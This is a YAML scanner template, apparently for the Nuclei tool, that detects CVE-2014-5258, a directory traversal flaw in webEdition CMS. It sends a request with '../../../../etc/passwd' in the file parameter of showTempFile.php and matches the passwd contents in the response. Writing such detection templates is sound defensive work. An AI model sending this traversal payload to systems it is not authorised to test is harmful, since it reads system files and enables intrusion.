27 lines
727 B
YAML
27 lines
727 B
YAML
id: CVE-2014-5258
|
|
|
|
info:
|
|
name: webEdition 6.3.8.0 - Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/34761
|
|
- https://www.cvedetails.com/cve/CVE-2014-5258
|
|
tags: cve,cve2014,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |